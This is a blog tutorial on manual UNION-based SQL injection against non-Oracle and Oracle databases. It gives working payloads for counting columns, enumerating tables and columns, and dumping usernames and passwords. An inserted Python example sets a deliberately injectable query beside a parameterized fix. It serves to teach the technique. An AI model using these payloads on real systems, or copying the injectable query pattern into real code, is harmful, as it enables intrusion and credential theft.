Manual SQL Injection on Non-Oracle and Oracle Databases

Kapish Kuchroo
Apr 13, 2023

We have already seen on my blog how to use sqlmap to exploit vulnerabilities in web applications and databases. Today, we will learn how to manually exploit SQL injection on non-Oracle and Oracle databases. Security enthusiasts who want to learn SQL injection will find this blog helpful.

1. Realistic situation: You are given a web application that is connected to a database, and you have to exploit the database using SQL injection. The goal here is to get the contents of a non-Oracle database.

The first step is to find the number of columns returned by the query. The payload to find the number of columns is: UNION SELECT NULL,NULL--
Here we are trying to find the number of columns, and we are assuming there are two since we have used NULL twice. If there were three columns, we would have used NULL three times.

The second step is to find the data type of the columns. Both columns are of data type text here, which means string. The payload is: UNION SELECT 'abc', 'def'--

Next, we try to find the version of the database. Since it is a non-Oracle database, we will use the following payload: UNION SELECT version(), NULL--

Next, we will try to find the table names in the database. We will use the following payload: UNION SELECT table_name, NULL FROM information_schema.tables--

Next, we will try to output the column names of the table: UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'name of table'--

Finally, we will output the usernames and passwords using the following payload: UNION SELECT username, password FROM table_name-- (where table_name is the actual name of the table)

2. Realistic situation: You are given a web application that is connected to a database, and you have to exploit the database using SQL injection. The goal here is to get the contents of an Oracle database.

First, we will find the number of columns with the following payload:
UNION SELECT NULL,NULL FROM dual--

Next, we need to find the data type of the columns with the following payload: UNION SELECT 'abc', 'def' FROM dual--

Next, we need to find the version of the database with the payload: UNION SELECT banner, NULL FROM v$version--

Next, we will try to find the list of tables in the database with the following payload: UNION SELECT table_name, NULL FROM all_tables--

Next, we will find the column names of the table with the following payload: UNION SELECT column_name, NULL FROM all_tab_columns WHERE table_name = 'actual name of table'--

Finally, we will output the username and password using the following payload: UNION SELECT username, password FROM table_name-- (where table_name is the actual name of the table)
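Why the final UNION SELECT payload returns rows, and what stops it, shown as an added example that is not code from the original post. It assumes a constructed SQLite in-memory database (a non-Oracle engine, so no FROM dual), hypothetical products and users tables, and input that lands inside a single-quoted string literal, hence the leading quote on the constructed inputs.

```python
import sqlite3

def make_db():
    # Constructed in-memory database standing in for the application's backend.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (name TEXT, description TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES ('Gift card', 'Prepaid card');
        INSERT INTO users VALUES ('administrator', 'constructed-secret');
    """)
    return db

def search_vulnerable(db, name):
    # Input is concatenated into the SQL text: a quote in the input closes the
    # string literal and everything after it is parsed as SQL.
    sql = "SELECT name, description FROM products WHERE name = '" + name + "'"
    return db.execute(sql).fetchall()

def search_parameterized(db, name):
    # The value travels separately from the SQL text and is only compared as data.
    sql = "SELECT name, description FROM products WHERE name = ?"
    return db.execute(sql, (name,)).fetchall()

def union_probe_error(db, payload):
    # A UNION with the wrong column count makes the vulnerable query fail; these
    # errors in application or database logs are a useful detection signal.
    try:
        search_vulnerable(db, payload)
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None

# Constructed inputs in the shape of the page's payloads.
DUMP = "' UNION SELECT username, password FROM users--"
PROBE_3 = "' UNION SELECT NULL,NULL,NULL--"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal input:", search_vulnerable(db, "Gift card"))
    print("vulnerable, UNION input: ", search_vulnerable(db, DUMP))
    print("parameterized, UNION input:", search_parameterized(db, DUMP))
    print("probe error:", union_probe_error(db, PROBE_3))
```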

Thanks for reading this, smash the like buttons and see you guys in the next one. Peace✌🏽
